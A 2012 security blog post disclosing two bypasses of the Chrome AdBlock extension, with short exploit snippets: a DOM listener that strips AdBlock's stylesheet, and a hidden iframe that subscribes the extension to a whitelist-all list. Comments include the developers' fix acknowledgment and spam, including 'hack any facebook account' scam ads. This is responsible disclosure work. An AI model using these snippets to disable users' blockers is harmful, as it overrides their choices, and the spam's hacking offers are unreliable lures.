Tuesday, March 27, 2012

Chrome addons hacking: Bye Bye AdBlock filters!

Continuing the Chrome extension hacking (see part 1 and 2), this time I'd like to draw you attention to the oh-so-popular AdBlock extension. It has over a million users, is being actively maintained and is a piece of a great software (heck, even I use it!). However - due to how Chrome extensions work in general it is still relatively easy to bypass it and display some ads. Let me describe two distinct vulnerabilities I've discovered. They are both exploitable in the newest 2.5.22 version.

tl;dr: Chrome AdBlock 2.5.22 bypasses, demo here and here, but I'd advise you to read on.


If you want to analyze the extension code yourself, use my download script to fetch the addon from Chrome Web Store and read on:
// you need PHP with openssl extension and command line unzip for this
$ mkdir addons
$ php download.php gighmmpiobklfepjocnamgkkbiglidom AdBlock
Of course, you don't need to, but if you won't it makes me sad :/

Small bypass - disabling filter injection

Like many Chrome extensions, AdBlock alters the content of the webpages you see by modifying a page DOM. For example, it injects a  <link rel=stylesheet> that hides all ads with CSS. This all happens in adblock_start_common.js:
function block_list_via_css(selectors) {
  var d = document.head || document.documentElement;
  // Issue 6480: inserting a <style> tag too quickly made it be ignored.
  // Use ABP's approach: a <link> tag that we can check for .sheet.
  var css_chunk = document.createElement("link");
  css_chunk.type = "text/css";
  css_chunk.rel = "stylesheet";
  css_chunk.href = "data:text/css,";
  d.insertBefore(css_chunk, null);
// ... and fill the node contents later on
Sweet & cool, right? But the problem is websites have tons of ways to defend themselves from being altered. After all, it's their DOM you're messing with. So, the easiest bypass would be to listen for anyone adding a stylesheet and removing it.
function block(node) {
    if (   (node.nodeName == 'LINK' && node.href == 'data:text/css,') // new style
        || (node.nodeName == 'STYLE' && node.innerText.match(/^\/\*This block of style rules is inserted by AdBlock/)) // old style
        ) {

document.addEventListener("DOMContentLoaded", function() {
    document.addEventListener('DOMNodeInserted', function(e) {
    // disable blocking styles inserted by AdBlock
    }, false);
}, false);
In the effect the stylesheet is removed and the ads are not hidden anymore. See in the demo. This is similar to how many Chrome extensions work. Extension authors should remember that you can't rely on page DOM to be cool with you, it can actively prevent modification. In other words, it's not your backyard, behave.

Total bypass - Disable AdBlock for good

The previous one was a kid's play, but the real deal is here. Any website can detect if you're using Chrome AdBlock and disable it completely for the future. It is possible thanks to a vulnerability in a filter subscription page. Subscription code works by launching chrome-extension://gighmmpiobklfepjocnamgkkbiglidom/pages/subscribe.html page. Here's what happens:
// pages/subscribe.js
  //Get the URL
  var queryparts = parseUri.parseSearch(document.location.search);
  //Subscribe to a list
  var requiresList = queryparts.requiresLocation ?
      "url:" + queryparts.requiresLocation : undefined;
      {id: 'url:' + queryparts.location, requires:requiresList});

First, the query string for the page is parsed and than a subscription request is sent to extension background page getting the location parameter. So, when extension launches subscribe.html?location=http://example.com this will subscribe to a filter from URL http://example.com.

All neat, but what extension authors don't know, standard web pages page can load your extension resources too. In the future, extension authors can limit this by using web_accessible_resources, but for Current Chrome 17 it's not possible.

So, what is the easiest way to disable Chrome AdBlock? Make it subscribe to a whitelist-all list:
<iframe style="position:absolute;left:-1000px;" id="abp" src=""></iframe>
document.getElementById('abp').src = 'chrome-extension://'+addon_id + '/pages/subscribe.html?location=' + location.href.replace('disable.html', 'list.txt');
See for yourself in the demo.
To reenable AdBlock functionality go to extension settings, choose the filter list  tab and disable the last added filter (koto.github.com one).

How to fix this in the code? Don't rely on the URL of your extension resource to perform some action.


r9s said...

Nice job.

pogue972 said...

Have you let the author of Adblock know about the sploits?  I don't know coding, so my questions may be stupid.  But, is this more of a Chrome problem, an extension problem (in general), or more like a advertiser cat vs mouse type of thing?

Btw, there is an extension (you may or may not be aware of/interested in) for Chrome thats kind of supposed to work like NoScript for Firefox called NoScript, but its really really in early development and kind of breaks everything. https://code.google.com/p/scriptno/

Zzii said...

and firefox's adblock is not exploitable because it uses browser level filters ,something chrome doesnt let you do

RJ said...

Great article!

michalstanko said...

Thanks for the article, it's very interesting.

Anyway, the best adblock you can have is turning plug-ins (Flash) off, which is supereasy in Opera, easy in Chrome, and possible in Firefox with Flashblock (there might be easier way I don't know about). And then whitelist sites like Gmail, YouTube, Google Maps or Dropbox, which use Flash for something useful.

Wladimir Palant said...

Nice vulnerability you found there. Just a note: Adblock Plus for Chrome is not affected, only Adblock. As to CSS tricks - yes, that's a Chrome limitation and not something that extension authors can currently fix (Adblock Plus for Firefox is fine).

kkotowicz said...

Yup, we have to wait for webRequest ( http://code.google.com/chrome/extensions/trunk/webRequest.html ) until real ad blocking is supported, so I consider the first vulnerability just a sweet, interesting trick. But you should fix the second one nonetheless ;)

kkotowicz said...

Sorry, I confused the extensions - so many AdBlocks to choose from ;) I've already contacted Michael about the issues. 

Wladimir Palant said...

 Yes, it is confusing. Wasn't my idea to name a competing extension "Adblock".

Anyway, I think that Adblock Plus is completely waterproof now. Web pages can no longer mess with extension pages, not even theoretically.

Michael Gundlach said...

Thanks for the heads up, Krzysztof.  The next release of AdBlock will fix the second vulnerability.  As Wladimir mentioned, the first only prevents hiding rules from working, though blocking will still work.

James Edward Lewis said...

It's ScriptNo, and once you start Trusting a few sites it doesn't seem to break anything anymore; in this respect it is like NoScript's default setup. Also it's fairly mature by now, having switched over to using the ContentSettings and WebRequest APIs available with Chrome 17.

It doesn't, however, have some of the more advanced functionality of NoScript, like surrogate scripts, the XSS filter, or the Application Boundaries Enforcer, and it also doesn't block plugins (but the click-to-play flag is available for that, and Chrome blocks most plugins by default anyway) or frames (but Better Popup Blocker works well for that).

EliSklar said...

"After all, it's their DOM your messing with"
I'm not usually a grammar nazi, but this "your" just makes me cringe.

kkotowicz said...

Agrh, fixed, thanks!

Marshal Walker said...

Thanks for telling all the spammers 

Anonim said...

Doesn't work on AdBlock Plus ;D

song jia said...

Valuable information and excellent design you got here! I would like to thank you for sharing your thoughts and time into the stuff you post!! Thumbs up.  www.cheapbeatsearphones.com/


I don't want sex ads on my wall on pinterest and ad block was working perfectly, now it's not and they are back. I want them off. I'm my pinterest account and I have thousands of followers. I dont' really want to see dirty derik cums for you on my wall!  I'm pretty pissed.  How do I get it off my walls. Disgusted! 

Noreply said...

"After all, it's their DOM you're messing with"

on their server it is.  In my cache it is MINE to alter as I please for my selective viewing

HumminGly said...

1loopback proxy adblocking is not affected.  AdBlock (Plus) ought offer this model as an alternative.  xulrunner?

[at] kotowicz : ScriptNo (chromium)

HumminGly said...

" a advertiser cat vs mouse type of thing?"

Guess who always wins?

(hint: not the ad servers)

Billy belend said...


Escort Manchester said...

If I could say one thing about this blog it would be
design! I mean, I was so distracted by the clashing colours that it was pointless to try to read the blog. What are trying to do here exactly? No one can read this is if it looks like a kid smashed a box of Crayola on your page! Please do something about this.http://www.escortchaps.co.uk/

Hack Facebook said...

I'm excited to discover this web site. I wanted to thank you for your time due to this wonderful read!! I definitely appreciated every part of it and I have you book-marked to see new things in your web site. Ever wanted to hack your friends or foes facebook account? Worry not, we have the simplest and easiest tool to hack any facebook profile or account for free. Just visit www.hackfbaccount.net and start hacking.

Hack Facebook said...

Good post. I learn something new and challenging on sites I stumbleupon everyday. It's always useful to read through content from other writers and practice a little something from other websites. Ever wanted to hack your friends or foes facebook account? Just visit www.hackfbaccounts.org and hack anyboy today. No strings attached. It takes just 2 minutes to hack any facebook account.

Lewis N. Clark said...

A community for technical news and discussion of
information security and closely related topics. Posting Guidelines.
Always link to the original ...

coaster ville facebook

sizegenetics discount said...

Sorry for the significant assessment, but I'm honestly loving the new Zune, and hope this, together with the wonderful evaluations some other persons have written, will assist you to make a decision if it is the right choice for you.sizegenetics discount

sizegenetics discount said...

Let me start off by saying nice post. Im not certain if it has been talked about, but when utilizing Chrome I can never get the whole site to load without refreshing numerous times. Could just be my computer system. Thanks.stellar phoenix photo recovery

sizegenetics discount said...

I'm typically to blogging and i genuinely appreciate your posts. The article has truly peaks my interest. I am going to bookmark your website and maintain checking picking particulars.wondershare dr fone

Nico said...

Does this still work?

Clipping Path Service said...

A great way of making me feel like what you have to say is just as important to me as it is to you. Keep it up!
Clipping Path service

otr214425 said...

Work from home theory is fast gaining popularity because of the freedom and flexibility that comes with it. Since one is not bound by fixed working hours, they can schedule their work at the time when they feel most productive and convenient to them. Women & Men benefit a lot from this concept of work since they can balance their home and work perfectly. People mostly find that in this situation, their productivity is higher and stress levels lower. Those who like isolation and a tranquil work environment also tend to prefer this way of working. Today, with the kind of communication networks available, millions of people worldwide are considering this option.

Women & Men who want to be independent but cannot afford to leave their responsibilities at home aside will benefit a lot from this concept of work. It makes it easier to maintain a healthy balance between home and work. The family doesn't get neglected and you can get your work done too. You can thus effectively juggle home responsibilities with your career. Working from home is definitely a viable option but it also needs a lot of hard work and discipline. You have to make a time schedule for yourself and stick to it. There will be a time frame of course for any job you take up and you have to fulfill that project within that time frame.

There are many things that can be done working from home. A few of them is listed below that will give you a general idea about the benefits of this concept.

This is the most common and highly preferred job that Women & Men like doing. Since in today's competitive world both the parents have to work they need a secure place to leave behind their children who will take care of them and parents can also relax without being worried all the time. In this job you don't require any degree or qualifications. You only have to know how to take care of children. Parents are happy to pay handsome salary and you can also earn a lot without putting too much of an effort.

For those who have a garden or an open space at your disposal and are also interested in gardening can go for this method of earning money. If given proper time and efforts nursery business can flourish very well and you will earn handsomely. But just as all jobs establishing it will be a bit difficult but the end results are outstanding.

Freelance can be in different wings. Either you can be a freelance reporter or a freelance photographer. You can also do designing or be in the advertising field doing project on your own. Being independent and working independently will depend on your field of work and the availability of its worth in the market. If you like doing jewellery designing you can do that at home totally independently. You can also work on freelancing as a marketing executive working from home. Wanna know more, email us on workfromhome.otr214425@gmail.com and we will send you information on how you can actually work as a marketing freelancer.

Internet related work
This is a very vast field and here sky is the limit. All you need is a computer and Internet facility. Whatever field you are into work at home is perfect match in the software field. You can match your time according to your convenience and complete whatever projects you get. To learn more about how to work from home, contact us today on workfromhome.otr2144225@gmail.comand our team will get you started on some excellent work from home projects.

Diet food
Since now a days Women & Men are more conscious of the food that they eat hence they prefer to have homemade low cal food and if you can start supplying low cal food to various offices then it will be a very good source of income and not too much of efforts. You can hire a few ladies who will help you out and this can be a good business.

Thus think over this concept and go ahead.

pou4 said...

pou hack and pou codes for pou

شركة الامتياز said...

شركة شراء اثاث مستعمل بالرياض

حقين بيع الاثاث

شراء اثاث مستعمل بشمال الرياض

شركة خدمات منزلية said...

شركة تسليك مجارى بالدمام

شركة تنظيف مسابح بالدمام

شركة تنظيف موكيت بالدمام

شركة مكافحة حشرات بالدمام

شركة كشف تسربات بالدمام

شركة نظافة عامة بالدمام

شركة نقل اثاث بالدمام

شركة تسليك مجارى بالرياض

تخزين اثاث بالرياض

كشف تسربات بالرياض

مكافحة حشرات بالرياض

نقل اثاث بالرياض

Unknown said...

الان سوف تجد من خلال شركة يونيون اير المتقدم في العمل علي اعلي مستوي من التقدم استمتع مع صيانة يونيون اير التي تتميز بكافة الخدمات المتميزه والمتطورة في كافة الاعمال المتميزه في العمل علي اعلي مستوي من التقدم .

maintenanceg said...

خدمات الصيانة علي اعلي جودة في مصر من افضل الشركات دليل الصيانات الشامل سوف يقدم اليكم كافة الاعمال و صيانة بيكو من افضل المراكز المتميزه في العمل علي اعلي مستوي صيانة يونيون اير
التي بها جميع الاعمال المتميزه .

صيانة said...

صيانة كافة الاجهزة المنزلية بيد متخصصين ذو كفاءه عالية ومتميزه في العمل مع شركة العالمية لدينا صيانة جليم جاز المعتمدة في صيانة الاجهزة الكهربائية علي اعلي اعلي جودة في مصر استمتع بكفاة الخدمات المتميزه والعالمية .